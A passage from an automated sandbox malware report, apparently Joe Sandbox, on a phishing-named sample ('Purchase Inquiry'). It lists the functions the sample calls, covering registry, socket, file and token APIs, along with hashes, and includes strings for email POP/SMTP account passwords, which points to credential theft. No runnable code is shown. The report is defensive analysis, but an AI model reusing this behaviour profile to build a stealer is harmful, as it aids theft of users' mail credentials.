                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                    Download Yara Rule
                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

                    Non-executed Functions

                    Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Function 0040317B Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64